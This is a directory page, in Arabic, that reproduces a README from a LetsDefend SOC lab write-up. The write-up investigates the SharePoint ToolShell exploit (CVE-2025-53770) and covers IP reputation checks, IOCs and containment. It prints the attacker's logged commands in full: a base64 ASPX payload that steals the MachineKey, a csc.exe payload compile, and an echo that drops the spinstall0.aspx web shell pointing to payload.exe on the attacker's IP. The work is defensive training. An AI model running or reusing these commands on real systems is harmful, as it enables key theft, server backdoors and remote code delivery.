Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell — شرح تفصيلي لاستغلال ثغرة اليوم الصفري CVE-2025-53770 (ToolShell) في SharePoint، بما في ذلك تحليل تنفيذ الأوامر عن بُعد (RCE)، واستخراج MachineKey، وتجميع الحمولة، ونشر شيل الويب، وخطوات احتواء الاستجابة للحوادث. | Kitploit
أدوات/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
إدارة مؤشرات الاختراق (IOC)تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتحليل البرمجيات الخبيثةالتحاليل الرقمية الجنائيةاختبار الاختراقاستخبارات التهديداتالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الاستجابة للحوادث
مختبرات وتدريب عملي
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

شرح تفصيلي لاستغلال ثغرة اليوم الصفري CVE-2025-53770 (ToolShell) في SharePoint، بما في ذلك تحليل تنفيذ الأوامر عن بُعد (RCE)، واستخراج MachineKey، وتجميع الحمولة، ونشر شيل الويب، وخطوات احتواء الاستجابة للحوادث.

عرض المستودع
منذ 10 أشهرلم تتم المراجعة بعد

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

مقدمة

قمت باستكشاف ثغرة يوم صفر في SharePoint تُسمى ToolShell (CVE-2025-53770) في مختبر LetsDefend. قمت بمحاكاة هجوم حقيقي من نوع zero-day حيث تجاوز طلب POST ضار المصادقة، وشغل PowerShell لسرقة مفاتيح MachineKeySection، وقام بتجميع payload.exe، وأسقط بابًا خلفيًا ويب (spinstall0.aspx). سجلت كل شيء، وحللت السلوك، واحتوت المضيف. يغطي هذا الملف README عمليات الهجوم، والخطوات اللازمة لإيقاف الهجوم، والدروس المستفادة.

نظرة عامة على المختبر

  • المنصة: LetsDefend Cyber Range
  • الهدف: خادم SharePoint (SharePoint01)
  • CVE: CVE-2025-53770
  • الهدف: تحليل RCE، وممارسة الكشف والاحتواء

الأدوات المستخدمة:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • إدارة السجلات في LetsDefend
  • أمان نقاط النهاية في LetsDefend
  • مفكك Base64
  • استخبارات التهديدات في LetsDefend

التنبيه

صورة

هذا تنبيه حساس ونشاط مشبوه استهدف صفحة ToolPane.aspx في MS SharePoint بحمولة كبيرة ومُحيل (Referer) مزيف. سياق CVE مرتبط بـ CVE-2025-53770. إنها ثغرة حرجة في SharePoint من خلال طلب POST مصمم خصيصًا سمح للمهاجمين غير المصادقين. أدى الاستغلال الناجح إلى تنفيذ تعليمات برمجية عن بُعد (RCE) على الخادم. تعاملت مع هذا على أنه نشط وعاجل وافترضت احتمال اختراق ناجح حتى يثبت العكس.

معنى SharePoint باختصار

Microsoft SharePoint هو منصة للتعاون المؤسسي وإدارة المستندات — بشكل أساسي مركز آمن ومنظم للملفات وسير العمل وتطبيقات الويب الداخلية.

الاستخدامات الأساسية

  • إدارة المستندات: التحكم في الإصدار، مسارات التدقيق، صلاحيات الملفات
  • التعاون: يمكن لعدة مستخدمين التحرير والمشاركة معًا
  • الإنترانت / البوابات: أخبار داخلية، سياسات الموارد البشرية، لوحات المعلومات
  • سير العمل والأتمتة: النماذج، الموافقات، الإشعارات
  • التكامل: يتصل مع Teams وOutlook وتطبيقات Office وPower BI

اعتبارات أمان SharePoint

  • يستخدم Active Directory أو SSO للمصادقة
  • البيانات مشفرة أثناء الراحة وأثناء النقل
  • يمكن إساءة استخدام أجزاء الويب والتخطيطات إذا تم تكوينها بشكل خاطئ
  • التصحيح المنتظم أمر بالغ الأهمية للدفاع ضد ثغرات zero-day

ما هو CVE-2025-53770 (ToolShell)

ثغرة zero-day حرجة في خادم Microsoft SharePoint تتيح للمهاجمين تشغيل التعليمات البرمجية عن بُعد دون مصادقة. تسيء استخدام إلغاء التسلسل غير الآمن وغالبًا ما تتحد مع ثغرات SharePoint أخرى (CVE-2025-49704, CVE-2025-49706) للسيطرة الكاملة على النظام. تقييم CVSS 9.8 (حرج) ويتم استغلالها بنشاط في البرية.

تحليل الهجوم باستخدام VirusTotal

قمت بتحليل عنوان IP للمرسل (عنوان IP المصدر) باستخدام VirusTotal عنوان IP المصدر: 107.191.58.76 صورة

من هذا أستطيع أن أرى أن 15/95 بائع أمني أشاروا إلى عنوان IP هذا على أنه ضار مما يخبرنا الكثير عن عنوان IP.

موقع IP

الآن علي البحث عن موقع IP. تم ذلك بمساعدة AbuseIPDB وكما هو موضح أدناه، فإن IP معروف بالاختراق، الهجمات بالقوة الغاشمة، هجمات تطبيقات الويب، فحص المنافذ، تسميم DNS.

صورة

تحليل نقطة النهاية

كمحلل SOC يحل هذه المشكلة، أحد الخطوات المهمة التي يجب اتخاذها هو تحليل نقطة النهاية. بحثت عن المضيف في أمان نقطة النهاية باسم 'SharePoint01' ولأن IP معروف بالاختراق لمزيد من التحليل.

صورة

بعد تحديد موقع المضيف، زرعت محفوظات الطرفية للتحقق من سطر الأوامر

صورة

| سطر أوامر محفوظات الطرفية

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

أعلام PowerShell: -nop -w hidden -e

  • -nop = لا يوجد ملف تعريفي (تجنب البرامج النصية للملف التعريفي).
  • -w hidden = بدء النافذة مخفية (تخفي).
  • -e = أمر مشفر

نتائج سطر الأوامر باستخدام مفكك Base64:

نظرًا للحمولة، تقدمت إلى مفكك Base64 لفك تشفير الأمر كما هو موضح أدناه

صورة

أطلق المستخدم PowerShell من دليل النظام “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” وبأوامر مشفرة برنامج C# من جانب الخادم ASP.NET.

  • يستخدم الانعكاس لتحميل تجميع System.Web،
  • يصل إلى MachineKeySection غير العمومي ويستدعي طريقة غير عمومية (GetApplicationConfig)،
  • يقرأ قيم MachineKey لتطبيق الويب (ValidationKey, DecryptionKey, إلخ)،
  • يكتب تلك المفاتيح إلى استجابة HTTP (أي يسرّبها).

التقاط الحمولات وأنشطة ما بعد الاستغلال: / _layouts/15/ToolPane.aspx?...

يحاول الحمولة قراءة وتسريب MachineKey ASP.NET للمضيف - وهو سر يمكن استخدامه لتزوير رموز ViewState/إلغاء التسلسل وتمكين تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد. يتطابق هذا مع نمط استغلال ToolShell (إساءة استخدام MachineKey). مؤشرات الاختراق الرئيسية (IoCs) في الأمر باستخدام فك تشفير Base64 وترميزه.

  • يشير POST + الحمولة الكبيرة + هذا الأمر المشفر إلى أن المهاجم حاول على الأرجح إنشاء أو تنفيذ مثل هذا البرنامج النصي من جانب الخادم عبر مسار استغلال ToolShell.
  • تم تشغيل كشف واختراق الآلة: استخدام -encodedCommand + نافذة مخفية + حمولة base64 يشير إلى التهرب والاستغلال الآلي. يستخدم المهاجمون بشكل متكرر -encodedCommand لإخفاء الحمولات وتجنب أنماط تسجيل سطر الأوامر/الكشف. يسمح نمط الحمولة للمهاجم بإنشاء ViewState ضار أو حمولات متسلسلة سيقبلها التطبيق على أنها صالحة، مما يتيح تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد في حالات SharePoint الضعيفة. بالنسبة لـ ToolShell (CVE-2025-53770)، هذا هو بالضبط سلسلة الاستغلال.

تنفيذ CMD والاستغلال

حاول المهاجم الوصول إلى التكوين الخاص ويهدف إلى الاستغلال، وبالتالي إساءة استخدام .NET. من مفكك Base64 يمكننا رؤية System.Web.Configuration.MachineKeySection و GetApplicationConfig: يحتوي MachineKeySection على:

  • مفتاح التحقق الخاص بـ machine/app
  • مفتاح فك التشفير الخاص بـ machine/app

هذه المفاتيح هي أسرار تستخدم لحماية viewstate ومصادقة النماذج. استرجاعها هو محاولة مباشرة للحصول على مواد تسمح بتزوير/التحقق من صحة حمولات ASP.NET المتسلسلة → شرط مسبق مباشر لـ RCE القائم على إلغاء التسلسل.

نتائج أوامر CMD:

بعد ثلاث ثوانٍ فقط كما هو موضح أعلاه، أرسل المهاجم أمرًا آخر

صورة

| سطر أوامر محفوظات الطرفية

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs.

النتائج

  • تظهر الأوامر مترجم C# (csc.exe) الذي يأتي مع إطار .NET. وظيفته هي أخذ كود المصدر (ملفات .cs) وتجميعه إلى تجميع .NET عادةً .exe أو .dll.
  • قام المهاجم بتحميل أو إنشاء ملف كود مصدر C# (payload.cs) على المضيف الضحية، ثم استخدم مترجم .NET المدمج (csc.exe) لتجميعه إلى ملف تنفيذي لنظام Windows (payload.exe). يمكن أن تكون هذه الحمولة برنامجًا ضارًا.

نتائج أوامر CMD أخرى:

بعد ثانيتين فقط كما هو موضح أعلاه، أرسل المهاجم أمرًا آخر

صورة

| سطر أوامر محفوظات الطرفية

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs."C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx.

النتائج

  • استخدم المهاجم cmd.exe لإنشاء ملف ASPX جديد (spinstall0.aspx) داخل دليل LAYOUTS في SharePoint عن طريق إعادة صدى نموذج HTML/code إلى ذلك المسار.
  • يحتوي ASPX المحقون على مع Url="http://107.191.58.76/payload.exe"، لتوجيه الخادم أو الزائر إلى تلك الحمولة البعيدة.
  • وضع الملف تحت ...\TEMPLATE\LAYOUTS\ يجعله متاحًا عبر تطبيق الويب SharePoint (باب خلفي/مُسقط ويب دائم يمكن الوصول إليه).
  • يشير هذا إلى محاولة تسليم/تنفيذ بعيدة لـ payload.exe من المضيف المسيطر عليه من قبل المهاجم (107.191.58.76) وهو علامة واضحة على الاختراق والتهديد المستمر.
  • نتائج أوامر CMD أخرى:

    بعد خمس ثوانٍ فقط كما هو موضح أعلاه، أرسل المهاجم أمرًا آخر

    صورة

    | سطر أوامر محفوظات الطرفية

    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command"[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

    النتائج

    • نفذ PowerShell مرة أخرى لاستدعاء System.Web.Configuration.MachineKeySection.GetApplicationConfig()، الذي يقرأ تكوين MachineKey للتطبيق.
    • يستعيد ذلك ValidationKey/DecryptionKey المستخدمين لتوقيع/تشفير ViewState ورموز المصادقة - وهي مواد يمكن للمهاجم استخدامها لتزوير الحمولات المتسلسلة وتجاوز المصادقة.
    • هذه خطوة استطلاع/تسريب ثابتة ومتسقة في سلسلة استغلال على نمط ToolShell (تحضير لـ RCE) تم استدعاؤها يدويًا.

    يظهر هذا النشاط نمطًا ثابتًا وسأتعامل معه على أنه اختراق عالي الثقة، وسأجمع القطع الأثرية الجنائية فورًا.

    استخبارات التهديدات

    بعد جمع جميع الأوامر والنتائج، قمت بإجراء بحث إضافي في استخبارات التهديدات وبحثت حسب نوع البيانات IP. يظهر مصدر البيانات OnlyHunt و TAG CVE-2025-53770 مع Referer: /_layouts/SignOut.aspx لقناة التحقيق في التنبيهات أنه SharePoint شرعي تم تزويره أو استخدامه ثم تسجيل الخروج من SharePoint لجعله يبدو وكأنه نشأ من إجراء SharePoint عادي. في تلك المرحلة، قمت باحتواء المضيف.

تنزيل الأداة
صورة

IOC (القطع الأثرية)

  • IP 107.191.58.76: عنوان IP المصدر للمهاجم الذي لوحظ أنه أرسل POST الاستغلال
  • /_layouts/15/ToolPane.aspx?DisplayMode=Edit: النوع "url". نقطة نهاية الاستغلال المستهدفة بواسطة POST
  • Spinstall0.aspx: النوع "filename". اسم ملف الباب الخلفي ASPX الضار المنشور
  • MachineKeySection: النوع "string". سلسلة كود ASPX تشير إلى تسريب MachineKey

ملاحظة التحليل والملخص الخاص بي

ملاحظة المحلل — SOC342 (CVE-2025-53770 / ToolShell) — SharePoint01

التاريخ/الوقت:2025-07-22 13:07 (حدث) المحلل:[اسمك] رقم الحالة:SOC342 المضيف:SharePoint01 الخطورة: حرجة

الملخص

لاحظت هجومًا حرجًا لمحاولة استغلال ثغرة zero-day في 2025-07-22 13:07 يُسمى ToolShell (CVE-2025-53770) في خادم SharePoint محلي باسم مضيف SharePoint01. المهاجم، من IP ضار معروف (107.191.58.76) وهو مصدر POST ومضيف الحمولة، تجاوز المصادقة لتشغيل تعليمات برمجية عن بُعد على الخادم. المستخدم قام بتحميل/إنشاء spinstall0.aspx في دليل LAYOUTS في SharePoint وقام بتنفيذ PowerShell لقراءة مادة MachineKey ASP.NET ولتجميع حمولة C# عبر csc.exe. وبالتالي، سمح لهم بصياغة حمولات موثوقة. هذا النشاط متسق مع نشر باب خلفي ويب مع spinstall0.aspx في SharePoint، وتسريب MachineKey، وتجميع حمولة على المضيف - جميعها مؤشرات عالية الثقة على الاختراق.

تحديث ملاحظة المحلل في دليل اللعب الخاص بي

صورة
صورة

الخطوات الموصى بها لإيقاف أنشطة المهاجم:

بعد اكتشاف الاختراق، أوصيت في ملاحظة المحلل باتخاذ الخطوات التالية

  1. الاحتواء: إذا مصرح به، اعزل SharePoint01 عن الشبكة؛ إذا لم يكن كذلك، حافظ على قيود الصادرة واحظر IPs/مجموعات المهاجم.
  2. الصيد: ابحث في جميع SharePoint وتأكد من وجود نسخ احتياطية كافية
  3. الاستئصال: أزل الملفات الضارة المؤكدة وأي مهام/خدمات مجدولة غير مصرح بها؛ افحص بحثًا عن ثبات إضافي.
  4. التخفيف: قم بتدوير قيم MachineKey ASP.NET/وقم بتطبيق تصحيحات الطوارئ من Microsoft يوليو 2025 على جميع حالات SharePoint المحلية. قم بتنسيق التدوير مع مالكي التطبيقات.
  5. الكشف والمنع: انشر/أضف قواعد الكشف واصطد عبر البيئة بحثًا عن نشاط مماثل.